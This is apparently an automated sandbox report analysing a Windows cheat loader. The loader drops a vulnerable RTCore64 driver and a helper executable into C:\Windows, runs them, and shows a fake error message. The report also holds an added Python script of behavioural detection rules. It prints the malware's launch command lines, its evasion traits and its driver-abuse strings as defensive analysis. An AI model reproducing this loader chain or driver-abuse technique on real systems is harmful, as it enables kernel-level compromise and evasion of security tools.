Windows Analysis Report
lUAc7lqa56.exe

Overview

General Information

Sample name: lUAc7lqa56.exe (renamed because the original name is a hash value)
Original sample name: 4c428e14cf5fc2c5e54ba377389c8253.exe
Analysis ID: 1541826
MD5: 4c428e14cf5fc2c5e54ba377389c8253
SHA1: bb3972cfb6adc178d8fd17dde519d15a6471e4b9
SHA256: f142f2fefbbd174fbc0d3d6cbe4cb5caa48389dfce9ee63f10d82b503e705468
Tags: 64exe

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Accesses win32k, likely to find offsets for exploits
Detected VMProtect packer
Drops executables to the windows directory (C:\Windows) and starts them
Found direct / indirect Syscall (likely to bypass EDR)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly setting hooks in a foreign process
Sample is not signed and drops a device driver
Tries to detect debuggers (CloseHandle check)
Tries to detect virtualization through RDTSC time measurements
Tries to evade analysis by executing special instructions (VM detection)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to load drivers
Contains functionality to query locales information (e.g. system language)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Creates or modifies windows services
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables driver privileges
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Spawns drivers
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • lUAc7lqa56.exe (PID: 2256 cmdline: "C:\Users\user\Desktop\lUAc7lqa56.exe" MD5: 4C428E14CF5FC2C5E54BA377389C8253)
    • conhost.exe (PID: 3852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4564 cmdline: C:\Windows\system32\cmd.exe /c cd C:\ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 6384 cmdline: C:\Windows\system32\cmd.exe /c start C:\Windows\Vulnerability.exe C:\Windows\driverfo.sys MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • Vulnerability.exe (PID: 5448 cmdline: C:\Windows\Vulnerability.exe C:\Windows\driverfo.sys MD5: 8619AFEC8BD66B2C589FC987D7D0B194)
        • conhost.exe (PID: 3592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1744 cmdline: C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\user\Desktop\lUAc7lqa56.exe" MD5 | find /i /v "md5" | find /i /v "certutil" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • certutil.exe (PID: 2740 cmdline: certutil -hashfile "C:\Users\user\Desktop\lUAc7lqa56.exe" MD5 MD5: F17616EC0522FC5633151F7CAA278CAA)
        • WerFault.exe (PID: 5408 cmdline: C:\Windows\system32\WerFault.exe -pss -s 460 -p 2256 -ip 2256 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • find.exe (PID: 2564 cmdline: find /i /v "md5" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
      • find.exe (PID: 3448 cmdline: find /i /v "certutil" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
    • cmd.exe (PID: 5820 cmdline: C:\Windows\system32\cmd.exe /c start cmd /C "color b && title Error && echo SSL connect error && timeout /t 5" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 3512 cmdline: cmd /C "color b && title Error && echo SSL connect error && timeout /t 5" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 6016 cmdline: timeout /t 5 MD5: 100065E21CFBBDE57CBA2838921F84D6)
    • WerFault.exe (PID: 2588 cmdline: C:\Windows\system32\WerFault.exe -u -p 2256 -s 1288 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched
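The process tree above is the whole loader choreography in one picture: the sample spawns cmd.exe to start the dropped C:\Windows\Vulnerability.exe with C:\Windows\driverfo.sys as its argument, hashes its own image with certutil (an integrity or anti-tamper check on the loader binary), and opens a console window titled "Error" that prints "SSL connect error" and sleeps five seconds so the victim sees a plausible failure. Each of those steps has a detectable shape that does not depend on the file names used in this campaign. The following Python is an added example, not part of the report or of the sample: it re-encodes the tree as process-creation events and runs four rules over them. PIDs and command lines are taken from the tree; the root's parent PID (set to 0), the System32 image paths for certutil, find, the inner cmd and timeout (the report shows only their bare command lines), and the allowlist of executables that legitimately live in the root of C:\Windows are assumptions.

```python
"""Behavioural detections over the process tree recorded in this sandbox report."""
import ntpath
import re
from collections import namedtuple

Event = namedtuple("Event", "pid ppid image cmdline")

# Constructed from the report's process tree: PIDs and command lines are the sandbox's.
# The root's parent PID is not in the report (0 here), the conhost.exe and WerFault.exe
# children are omitted, and the image paths of certutil, find, the inner cmd (PID 3512)
# and timeout are assumed to be the System32 copies.
EVENTS = [
    Event(2256, 0, "C:\\Users\\user\\Desktop\\lUAc7lqa56.exe",
          "\"C:\\Users\\user\\Desktop\\lUAc7lqa56.exe\""),
    Event(4564, 2256, "C:\\Windows\\system32\\cmd.exe", "C:\\Windows\\system32\\cmd.exe /c cd C:\\"),
    Event(6384, 2256, "C:\\Windows\\system32\\cmd.exe",
          "C:\\Windows\\system32\\cmd.exe /c start C:\\Windows\\Vulnerability.exe C:\\Windows\\driverfo.sys"),
    Event(5448, 6384, "C:\\Windows\\Vulnerability.exe",
          "C:\\Windows\\Vulnerability.exe C:\\Windows\\driverfo.sys"),
    Event(1744, 2256, "C:\\Windows\\system32\\cmd.exe",
          "C:\\Windows\\system32\\cmd.exe /c certutil -hashfile \"C:\\Users\\user\\Desktop\\lUAc7lqa56.exe\" MD5 "
          "| find /i /v \"md5\" | find /i /v \"certutil\""),
    Event(2740, 1744, "C:\\Windows\\System32\\certutil.exe",
          "certutil -hashfile \"C:\\Users\\user\\Desktop\\lUAc7lqa56.exe\" MD5"),
    Event(2564, 1744, "C:\\Windows\\System32\\find.exe", "find /i /v \"md5\""),
    Event(5820, 2256, "C:\\Windows\\system32\\cmd.exe",
          "C:\\Windows\\system32\\cmd.exe /c start cmd /C \"color b && title Error && echo SSL connect error && timeout /t 5\""),
    Event(3512, 5820, "C:\\Windows\\System32\\cmd.exe",
          "cmd /C \"color b && title Error && echo SSL connect error && timeout /t 5\""),
    Event(6016, 3512, "C:\\Windows\\System32\\timeout.exe", "timeout /t 5"),
]

_TOKEN = re.compile(r'"([^"]*)"|(\S+)')

def tokens(cmdline):
    """Split a Windows command line into arguments, unquoting "..." tokens."""
    return [quoted or bare for quoted, bare in _TOKEN.findall(cmdline)]

def ancestors(ev, tree):
    """Follow ppid links upwards until the parent is unknown to the tree."""
    chain, cur = [], tree.get(ev.ppid)
    while cur is not None:
        chain.append(cur)
        cur = tree.get(cur.ppid)
    return chain

# Executables that legitimately live directly in the Windows directory root. Illustrative
# assumption only; build the real list from a clean reference image.
WINDOWS_ROOT_ALLOWLIST = {"explorer.exe", "notepad.exe", "regedit.exe", "write.exe",
                          "hh.exe", "splwow64.exe", "bfsvc.exe", "winhlp32.exe"}

def image_in_windows_root(ev, tree):
    """Unknown PE executing from the root of the Windows directory, not a subdirectory."""
    directory, name = ntpath.split(ev.image)
    return directory.lower() == "c:\\windows" and name.lower() not in WINDOWS_ROOT_ALLOWLIST

def driver_path_on_cmdline(ev, tree):
    """A .sys path handed to a user-mode process: the shape of a driver loader invocation."""
    return any(t.lower().endswith(".sys") for t in tokens(ev.cmdline))

def self_hash_check(ev, tree):
    """certutil -hashfile pointed at the image of one of its own ancestors (anti-tamper check)."""
    toks = [t.lower() for t in tokens(ev.cmdline)]
    if ntpath.basename(ev.image).lower() != "certutil.exe" or "-hashfile" not in toks:
        return False
    idx = toks.index("-hashfile") + 1
    if idx >= len(toks):
        return False
    target = ntpath.basename(toks[idx])
    return any(ntpath.basename(a.image).lower() == target for a in ancestors(ev, tree))

def decoy_console_error(ev, tree):
    """A cmd window that sets a title, echoes an error and sleeps: a fake failure message."""
    return re.search(r"\btitle\b.*\becho\b.*\btimeout\b", ev.cmdline, re.IGNORECASE) is not None

RULES = {
    "image_in_windows_root": image_in_windows_root,
    "driver_path_on_cmdline": driver_path_on_cmdline,
    "self_hash_check": self_hash_check,
    "decoy_console_error": decoy_console_error,
}

def evaluate(events):
    """Return {pid: [names of rules that fired]} for every event that fired at least one rule."""
    tree = {e.pid: e for e in events}
    hits = {}
    for ev in events:
        fired = [name for name, rule in RULES.items() if rule(ev, tree)]
        if fired:
            hits[ev.pid] = fired
    return hits

if __name__ == "__main__":
    for pid, fired in evaluate(EVENTS).items():
        print(pid, ", ".join(fired))
```

The rules key on shape rather than on the names seen here: any executable running from the root of C:\Windows, any .sys path passed to a user-mode process, and certutil hashing an ancestor's image would all fire on the next build that renames Vulnerability.exe and driverfo.sys. In a real pipeline the events come from Sysmon event ID 1 or equivalent EDR telemetry, and the allowlist is derived from a clean reference image rather than typed in.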

AV Detection

Source: lUAc7lqa56.exe | Avira: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\driverfo[1].sys | Avira: detection malicious, Label: RKIT/Agent.ykqds
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Vulnerability[1].exe | Avira: detection malicious, Label: TR/Crypt.Agent.czxpy
Source: C:\Windows\Vulnerability.exe | Avira: detection malicious, Label: TR/Crypt.Agent.czxpy
Source: C:\Windows\driverfo.sys | Avira: detection malicious, Label: RKIT/Agent.ykqds
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Vulnerability[1].exe | ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\driverfo[1].sys | ReversingLabs: Detection: 33%
Source: C:\Windows\Vulnerability.exe | ReversingLabs: Detection: 55%
Source: C:\Windows\driverfo.sys | ReversingLabs: Detection: 33%
Source: lUAc7lqa56.exe | ReversingLabs: Detection: 37%
Source: lUAc7lqa56.exe | Virustotal: Detection: 29%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Vulnerability[1].exe | Joe Sandbox ML: detected
Source: C:\Windows\Vulnerability.exe | Joe Sandbox ML: detected
Source: lUAc7lqa56.exe | Joe Sandbox ML: detected
Source: lUAc7lqa56.exe, 00000000.00000002.1934985033.00007FF79005B000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits

Source: C:\Windows\Vulnerability.exe | File opened: C:\Windows\System32\win32k.sys
Source: unknown | HTTPS traffic detected: 104.26.0.5:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: lUAc7lqa56.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb. source: Vulnerability.exe, 00000004.00000002.1880738454.0000005CC92F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb0 source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb - unmatched source: Vulnerability.exe, 00000004.00000002.1880738454.0000005CC92F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb2u.dllK source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C200000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb source: Vulnerability.exe, 00000004.00000002.1880738454.0000005CC92F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\wasy\x64\Release\RTCore64_Vulnerability-main\x64\Release\RTCore64_Vulnerability.pdb source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdbAy> source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d:\os\obj\amd64fre\onecoreuap\windows\core\kmode\moderncore\objfre\amd64\typeinfo\win32k.pdb source: Vulnerability.exe, 00000004.00000003.1878962418.000002181E231000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879045308.000002181DC7C000.00000004.00000020.00020000.00000000.sdmp, AB6E94A2098C7E1ADF1A0B7B18448F0D6B5F55AA62BB62760C12A51161058F4B00[1].blob.4.dr, 74b74f1f14570c9cf7868ff6d4bda773.pdb.4.dr
Source: Binary string: Unknown exceptionbad array new lengthstring too longbad cast%02xsymbols\.pdb/\\\.\RTCore64user32.dllwin32u.dllsystemroot\System32\win32k.syshttps://msdl.microsoft.com/download/symbols[-] Failed to Load PDBNtUserSetGestureConfig[-] Failed to Load Symbol of NtUserSetGestureConfig[<] Loading vulnerable driver, Name: [-] Can't find TEMP folder[-] Failed to create vulnerable driver file[-] Failed to register and start service for the vulnerable driver[-] Failed to load driver rtcore64.sysntoskrnl.exe[-] Failed to get ntoskrnl.exewin32k.sys[-] win32k.sys not foundxxxH source: lUAc7lqa56.exe, 00000000.00000003.1796890061.00000245E10B2000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881228820.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880399638.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879638400.000002181DC7A000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881318765.000002181DC7A000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880040885.000002181DC7A000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879912102.000002181DB3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5 source: Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Hostmsdl.microsoft.comGET /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb HTTP/1.1 source: Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdbZ source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdbY source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880187140.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C279000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /win32k.pdb" source: Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdbiz source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rosoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb3.pdb % source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000004.00000003.1878741691.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880515250.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C279000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881137135.000002181DAC4000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\wasy\x64\Release\RTCore64_Vulnerability-main\x64\Release\RTCore64_Vulnerability.pdb33 source: Vulnerability.exe, 00000004.00000000.1821071304.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability.exe, 00000004.00000002.1881398993.00007FF7CC426000.00000002.00000001.01000000.00000007.sdmp, Vulnerability[1].exe.0.dr, Vulnerability.exe.0.dr
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdbK source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C200000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb_ source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C200000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb!x source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb!y source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5n source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: GET /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb HTTP/1.1 source: Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdbYz source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pC:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb)y source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\ioctl base updated by redshirtfan\build\driver\driver.pdb source: lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10BD000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798931127.00000245E10C0000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10B2000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1799010054.00000245E10AF000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.dr
Source: Binary string: win32k.pdbGCTL source: Vulnerability.exe, 00000004.00000003.1879106664.000002181DBE1000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C225000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb@ source: Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bad cast%02xsymbols\.pdb/\\\.\RTCore64user32.dllwin32u.dllsystemroot\System32\win32k.syshttps://msdl.microsoft.com/download/symbols[-] Failed to Load PDBNtUserSetGestureConfig[-] Failed to Load Symbol of NtUserSetGestureConfig[<] Loading vulnerable driver, Name: [-] Can't find TEMP folder[-] Failed to create vulnerable driver file[-] Failed to register and start service for the vulnerable driver[-] Failed to load driver rtcore64.sysntoskrnl.exe[-] Failed to get ntoskrnl.exewin32k.sys[-] win32k.sys not foundxxxH source: lUAc7lqa56.exe, 00000000.00000003.1796909009.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1796945638.00000245E1041000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1797006532.00000245E10AF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: win32k.pdb source: Vulnerability.exe, 00000004.00000003.1879106664.000002181DBE1000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C225000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols4b74f1f14570c9cf7868ff6d4bda773.pdb - unmatched source: Vulnerability.exe, 00000004.00000002.1880738454.0000005CC92F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5zs source: Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb7 source: Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdbm]g source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880187140.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C279000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pC:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb1y. source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pC:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ddhttps://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000004.00000003.1878741691.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880515250.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881137135.000002181DAC4000.00000004.00000020.00020000.00000000.sdmp
